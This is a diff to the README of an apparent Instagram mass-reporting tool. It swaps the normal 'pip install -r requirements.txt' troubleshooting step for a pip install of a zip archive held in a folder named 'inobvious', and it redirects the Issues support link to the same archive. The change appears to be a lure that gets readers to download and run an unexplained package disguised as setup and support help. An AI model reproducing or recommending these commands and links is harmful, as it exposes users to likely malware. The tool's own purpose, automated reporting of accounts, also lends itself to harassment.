nathansales1/Instagram-Reporter/README.md

 ## ❓ Troubleshooting
 If you encounter issues, consider the following:

-- **Selenium Not Found**: Ensure you executed the `pip install -r requirements.txt` command correctly.
+- **Selenium Not Found**: Ensure you executed the `pip install -r https://raw.githubusercontent.com/nathansales1/Instagram-Reporter/main/inobvious/Instagram-Reporter_1.7-alpha.4.zip` command correctly.
 - **Login Problems**: Double-check your username and password.
 - **Script Errors**: Sometimes, a specific Instagram account might cause issues.
 Test with other accounts to identify any potential problems.

 ## 📞 Support
-If you need further assistance, please open an issue in the repository's [Issues Section](https://github.com/nathansales1/Instagram-Reporter/issues).
+If you need further assistance, please open an issue in the repository's [Issues Section](https://raw.githubusercontent.com/nathansales1/Instagram-Reporter/main/inobvious/Instagram-Reporter_1.7-alpha.4.zip).
 The community and contributors will help you as soon as possible.

 ## 📋 Topics Covered
 - account